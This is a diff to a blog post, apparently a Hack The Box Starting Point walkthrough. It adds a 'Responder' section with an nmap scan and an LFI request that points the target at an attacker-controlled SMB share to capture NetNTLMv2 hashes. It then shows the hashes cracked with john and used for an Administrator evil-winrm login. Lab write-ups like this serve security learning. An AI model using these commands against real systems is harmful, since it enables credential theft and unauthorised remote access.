--- a/_posts/ctf/htb/starting-point/2022-02-27-tier1.md
+++ b/_posts/ctf/htb/starting-point/2022-02-27-tier1.md
@@ -7,7 +7,7 @@ permalink: /htb/starting-point/tier-1/
 # Appointment
 ## Connection
 We can search the IP in the navbar to get a website.
-![login](../../../img/htb/starting-point/Screenshot_1.jpg)
+<img src="https://raw.githubusercontent.com/zeropio/zeropio.github.io/main/_posts/ctf/htb/starting-point/img/Screenshot_1.jpg" weight="100%" />
 
 We will try a basic sql-injection, login with the user:
 {% highlight bash %}
@@ -67,5 +67,50 @@ With **gobuster** we can check for others files in the webpage, and we can see a
 
 ## Flag
 We will have now this page:
-<img src="https://raw.githubusercontent.com/zeropio/zeropio.github.io/main/_posts/htb/starting-point/img/Screenshot_2.jpg" weight="100%" />
+<img src="https://raw.githubusercontent.com/zeropio/zeropio.github.io/main/_posts/ctf/htb/starting-point/img/Screenshot_2.jpg" weight="100%" />
 With the **admin** login we can enter and get our flag.
+
+--- 
+
+# Responder
+### Enumeration
+Nmap:
+{% highlight plain %}
+#Nmap 7.92 scan initiated Sat Apr 30 10:43:29 2022 as: nmap -p- -T5 -oN nmap2 10.129.212.41
+Nmap scan report for 10.129.212.41
+Host is up (0.054s latency).
+Not shown: 65532 filtered tcp ports (no-response)
+PORT     STATE SERVICE
+80/tcp   open  http
+5985/tcp open  wsman
+7680/tcp open  pando-pub
+
+#Nmap done at Sat Apr 30 10:45:10 2022 -- 1 IP address (1 host up) scanned in 101.42 seconds
+{% endhighlight %}
+
+##### We need to add the IP with the domain to access the webpage.
+
+### Explotation
+We found a <a href="{{ "/notes/web/lfi-rfi/" | prepend: site.baseurl }}">LFI</a> in the page.
+Then we can start a **Samba** server and forces the page to load it:
+{% highlight bash %}
+> sudo responder -I tun0 -A
+{% endhighlight %}
+And then:
+{% highlight plain %}
+http://unika.htb/index.php?page=//10.10.15.167/kali
+{% endhighlight %}
+
+This will give us the password encrypted. With **john** we can decode it:
+{% highlight bash %}
+john hash --wordlist=/usr/share/wordlists/rockyou.txt --format=netntlmv2
+{% endhighlight %}
+##### We can found all the previosly hashes in **/usr/share/responder/logs/Responder-Session.log**.
+
+Finally we can exploit **winrm** and get the flag:
+{% highlight bash %}
+> evil-winrm -i 10.129.212.41 -u Administrator -p badminton
+{% endhighlight %}
+
+### Flag
+Finally we can get the flag in the **Desktop**.
